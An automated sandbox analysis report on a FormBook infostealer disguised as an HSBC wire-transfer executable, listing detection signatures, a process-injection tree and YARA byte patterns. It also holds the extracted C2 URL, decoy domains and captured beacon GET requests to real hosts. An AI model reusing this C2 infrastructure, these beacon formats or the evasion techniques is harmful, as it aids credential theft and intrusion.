Loading ...

Play interactive tourEdit tour

Windows Analysis Report HSBC ... Wire Transfer Copy.exe

Overview

General Information

Sample Name:HSBC ... Wire Transfer Copy.exe
Analysis ID:528773
MD5:99b154970d15748d1df9025f675ecc76
SHA1:75503611daf18643a401c2020ae9e045111b7f1f
SHA256:13af03cd2db9c68bc397fd81f101287df005f27bc806737ffad390324a068d4c
Tags:exeFormbookHSBC
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses ipconfig to lookup or modify the Windows network settings
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • HSBC ... Wire Transfer Copy.exe (PID: 6892 cmdline: "C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe" MD5: 99B154970D15748D1DF9025F675ECC76)
    • HSBC ... Wire Transfer Copy.exe (PID: 7164 cmdline: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe MD5: 99B154970D15748D1DF9025F675ECC76)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • ipconfig.exe (PID: 6536 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
          • cmd.exe (PID: 6672 cmdline: /c del "C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.atlantiscompania.com/m4n8/"], "decoy": ["loganvineyard.com", "seanna-charters.com", "ironbandfitness.com", "centuriesandsleuthsreviews.com", "saminicky2022.com", "oscarlorenzo.online", "donaldlittlelaw.com", "internetbook.net", "dailyhealthyfood.com", "kostarelosdair.com", "baodingtangyang.com", "cumberlndfarms.com", "dylanmellor.xyz", "investwithelsa.com", "dermaaesthetika.com", "shoelife864.com", "nightcosex.biz", "greauxbooks.com", "artwithnumber.com", "hyggestudio.store", "vektor-pro.com", "bookextraevents.com", "poweredsky.store", "carver150.com", "greenfleetshippingco.com", "raise-ryokwpl.xyz", "lobbiru.com", "tilcep.xyz", "frist-universe.com", "thehumanityleague.com", "zz4321.com", "rightpowereletricalservices.com", "alainasdesigns.com", "getcardanocoin.com", "wattnow.biz", "nitromaxfmx.com", "rty161578.top", "danielthan.com", "devjmccormick.com", "clearwaterwaverunners.com", "onlineames.com", "pureproducts.xyz", "yoothdirect.info", "tryprovo.com", "mkuu88888.xyz", "fibers2you.com", "urdnauha.xyz", "andfme.com", "shopkoman.com", "civico46bcn.com", "top-online-fashion-24.com", "lakshimechatronicssystems.com", "cortezphoto.com", "samallondemolitonyorkshire.com", "uang.exchange", "gonderipaylasim.net", "piramsgprodiet.store", "parasmountplus.com", "sifangav.net", "gramaltinrafineri.com", "kvb5676.com", "atomhome.xyz", "catproductreviews.com", "frenchieaday.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
    00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 31 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17a49:$sqlite3step: 68 34 1C 7B E1
        • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
        • 0x17a78:$sqlite3text: 68 38 2A 90 C5
        • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
        • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
        6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 18 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.atlantiscompania.com/m4n8/"], "decoy": ["loganvineyard.com", "seanna-charters.com", "ironbandfitness.com", "centuriesandsleuthsreviews.com", "saminicky2022.com", "oscarlorenzo.online", "donaldlittlelaw.com", "internetbook.net", "dailyhealthyfood.com", "kostarelosdair.com", "baodingtangyang.com", "cumberlndfarms.com", "dylanmellor.xyz", "investwithelsa.com", "dermaaesthetika.com", "shoelife864.com", "nightcosex.biz", "greauxbooks.com", "artwithnumber.com", "hyggestudio.store", "vektor-pro.com", "bookextraevents.com", "poweredsky.store", "carver150.com", "greenfleetshippingco.com", "raise-ryokwpl.xyz", "lobbiru.com", "tilcep.xyz", "frist-universe.com", "thehumanityleague.com", "zz4321.com", "rightpowereletricalservices.com", "alainasdesigns.com", "getcardanocoin.com", "wattnow.biz", "nitromaxfmx.com", "rty161578.top", "danielthan.com", "devjmccormick.com", "clearwaterwaverunners.com", "onlineames.com", "pureproducts.xyz", "yoothdirect.info", "tryprovo.com", "mkuu88888.xyz", "fibers2you.com", "urdnauha.xyz", "andfme.com", "shopkoman.com", "civico46bcn.com", "top-online-fashion-24.com", "lakshimechatronicssystems.com", "cortezphoto.com", "samallondemolitonyorkshire.com", "uang.exchange", "gonderipaylasim.net", "piramsgprodiet.store", "parasmountplus.com", "sifangav.net", "gramaltinrafineri.com", "kvb5676.com", "atomhome.xyz", "catproductreviews.com", "frenchieaday.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: HSBC ... Wire Transfer Copy.exeVirustotal: Detection: 16%Perma Link
          Source: HSBC ... Wire Transfer Copy.exeReversingLabs: Detection: 40%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, type: MEMORY
          Source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: HSBC ... Wire Transfer Copy.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: HSBC ... Wire Transfer Copy.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: ipconfig.pdb source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346858842.0000000001990000.00000040.00020000.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346858842.0000000001990000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346567819.000000000171F000.00000040.00000001.sdmp, HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, ipconfig.exe, 00000010.00000002.548146108.0000000003620000.00000040.00000001.sdmp, ipconfig.exe, 00000010.00000002.549823291.000000000373F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: HSBC ... Wire Transfer Copy.exe, HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346567819.000000000171F000.00000040.00000001.sdmp, HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, ipconfig.exe, ipconfig.exe, 00000010.00000002.548146108.0000000003620000.00000040.00000001.sdmp, ipconfig.exe, 00000010.00000002.549823291.000000000373F000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 4x nop then pop edi6_2_0040E477
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop edi16_2_02C6E477

          Networking:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 172.217.168.83 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.gramaltinrafineri.com
          Source: C:\Windows\explorer.exeDomain query: www.catproductreviews.com
          Source: C:\Windows\explorer.exeDomain query: www.piramsgprodiet.store
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.atlantiscompania.com/m4n8/
          Source: global trafficHTTP traffic detected: GET /m4n8/?l0G=-Zrd9J1pqHLdHPo&5jblCF=tUrd37IHNwUNrKy1BA5QR6EUYG6BNHyAaYYkpUFqoPlzKT8wvvxP2/AQv7fSiFC9KSL+ HTTP/1.1Host: www.piramsgprodiet.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m4n8/?5jblCF=6FC/YAdxArGDbOG0ZU8ranLB3olQ8/HIU17UMwKJ54PfoS0z6/xA4+VoDBKhLnDEQ6+k&l0G=-Zrd9J1pqHLdHPo HTTP/1.1Host: www.gramaltinrafineri.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m4n8/?l0G=-Zrd9J1pqHLdHPo&5jblCF=fqwcloTwW+H6Usea82LuZckhsM6vXxH+7LRp9WPFBQLwjEJmVheIZ7PCXY+dS9vifeb6 HTTP/1.1Host: www.catproductreviews.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Nov 2021 17:58:23 GMTContent-Type: text/htmlContent-Length: 275ETag: "61973ffe-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Nov 2021 17:58:43 GMTContent-Type: text/htmlContent-Length: 275ETag: "61973ffe-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.289914483.00000000028A1000.00000004.00000001.sdmp, HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: ipconfig.exe, 00000010.00000002.551598331.000000000403F000.00000004.00020000.sdmpString found in binary or memory: https://www.piramsgprodiet.store/m4n8/?l0G=-Zrd9J1pqHLdHPo&amp;5jblCF=tUrd37IHNwUNrKy1BA5QR6EUYG6BNH
          Source: unknownDNS traffic detected: queries for: www.piramsgprodiet.store
          Source: global trafficHTTP traffic detected: GET /m4n8/?l0G=-Zrd9J1pqHLdHPo&5jblCF=tUrd37IHNwUNrKy1BA5QR6EUYG6BNHyAaYYkpUFqoPlzKT8wvvxP2/AQv7fSiFC9KSL+ HTTP/1.1Host: www.piramsgprodiet.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m4n8/?5jblCF=6FC/YAdxArGDbOG0ZU8ranLB3olQ8/HIU17UMwKJ54PfoS0z6/xA4+VoDBKhLnDEQ6+k&l0G=-Zrd9J1pqHLdHPo HTTP/1.1Host: www.gramaltinrafineri.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m4n8/?l0G=-Zrd9J1pqHLdHPo&5jblCF=fqwcloTwW+H6Usea82LuZckhsM6vXxH+7LRp9WPFBQLwjEJmVheIZ7PCXY+dS9vifeb6 HTTP/1.1Host: www.catproductreviews.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
